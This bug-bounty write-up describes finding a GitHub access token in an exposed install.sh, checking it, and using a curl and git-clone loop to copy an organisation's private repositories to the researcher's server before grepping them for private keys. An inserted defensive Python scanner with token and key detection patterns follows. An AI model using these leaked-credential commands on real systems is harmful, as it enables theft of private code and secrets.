Full infrastructure takeover across a company's many brands
Note: this private program is hosted on the Bugcrowd platform and has many brands.
While testing this program I brute-forced directories and found this directory listing: http://sub.target.com/scripts
While analysing these files I found an interesting token in the [install.sh] file.
This is a GitHub access token, [d42e9078e94930************], but first I want to verify whether this token is valid or expired, because when a developer creates a token they can choose a time for it to expire automatically, like this:
Let's try to verify it:
https://api.github.com/orgs/<username>/repos?access_token=<token>
Request a URL like this with a browser or curl, then check whether the response lists repositories or says the token has expired.
Amazing!! I can list private repositories, but I can't report it without making sure the data is related to the company, because maybe this developer just works part-time for the company, so I will clone the private repositories and analyse them. Let's go!
curl "https://api.github.com/orgs/<username>/repos?access_token=<token>" | grep '"name"' | cut -d ":" -f 2 | cut -d '"' -f 2 > private_repos_name.txt
for repo in $(cat private_repos_name.txt); do git clone https://<access-token>@github.com/<username>/$repo; done
This bash code clones all the private repositories to my VPS so I can analyse them.
I found 5.4G of repositories, OMG..
I can't analyse this much data in a short time, so I will use the grep command to find sensitive data.
# Grep private ssh key command (the pattern starts with '-', so '--' ends option parsing)
grep -rE -- '-----BEGIN [A-Z ]*PRIVATE KEY-----' .
This regex finds private SSH keys in all the repositories, very nice.
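Checking deploy scripts and repositories for the two things this write-up turned up (a GitHub access token embedded in install.sh, and private keys found with grep) is what the owning team would run before a /scripts directory ever gets published. The scanner below is an added example, not code from the write-up: the install.sh content is constructed, and the keyword heuristic for 40-hex legacy tokens is an assumption of this example.

```python
import re
from dataclasses import dataclass

# Patterns for this added scanner (assumptions of the example, not from the write-up):
# legacy GitHub tokens are 40 hex chars and look exactly like a git commit SHA, so a
# token-like keyword must appear earlier on the same line; current tokens carry a
# gh?_ prefix followed by 36+ alphanumerics; private keys show a PEM header.
LEGACY_TOKEN = re.compile(r"(?i)(?:token|github|gh)[^\n]{0,60}?\b([0-9a-f]{40})\b")
PREFIXED_TOKEN = re.compile(r"\b(gh[pousr]_[A-Za-z0-9]{36,255})\b")
PRIVATE_KEY = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")

@dataclass
class Finding:
    path: str
    line_no: int
    kind: str
    sample: str  # redacted, so findings can go into a ticket or CI log safely

def redact(secret: str) -> str:
    # keep a short prefix so the owner can tell which token leaked
    return secret[:6] + "*" * (len(secret) - 6)

def scan_text(path: str, text: str) -> list:
    """Scan one file's contents line by line and return every hit."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if m := PREFIXED_TOKEN.search(line):
            findings.append(Finding(path, n, "github-token", redact(m.group(1))))
        elif m := LEGACY_TOKEN.search(line):
            findings.append(Finding(path, n, "github-token-legacy", redact(m.group(1))))
        if PRIVATE_KEY.search(line):
            findings.append(Finding(path, n, "private-key", line.strip()))
    return findings

# Constructed sample: a deploy script like the one found in the /scripts listing.
SAMPLE_INSTALL_SH = """#!/bin/sh
curl -s "https://api.github.com/orgs/example-org/repos?access_token=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef" > repos.json
git checkout 5f3a2b1c9d8e7f6a5b4c3d2e1f0a9b8c7d6e5f4a   # a commit SHA, not a secret
export GH_TOKEN=ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij
cat > id_rsa <<'EOF'
-----BEGIN OPENSSH PRIVATE KEY-----
EOF
"""

def scan_sample() -> list:
    return [(f.line_no, f.kind) for f in scan_text("install.sh", SAMPLE_INSTALL_SH)]

if __name__ == "__main__":
    for f in scan_text("install.sh", SAMPLE_INSTALL_SH):
        print(f"{f.path}:{f.line_no} {f.kind} {f.sample}")
```

The commit SHA on line 3 of the sample is deliberately left unflagged: without the keyword context, every 40-hex string in a repository would be reported.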
In these files I found many creds and many Docker connection strings, but I can't use them because it's out of scope for the program, which says not to try connecting to databases or internal infrastructure.
But I have more than 15 private repositories related to 15 brands :)
In every repo I found [panel passwords, database backups, full application code, cloud creds] and could connect to and take over all the brands.
Business impact
I reached all the [product architecture, product layouts], but sorry, I can't share this, to preserve the confidentiality of the company's data.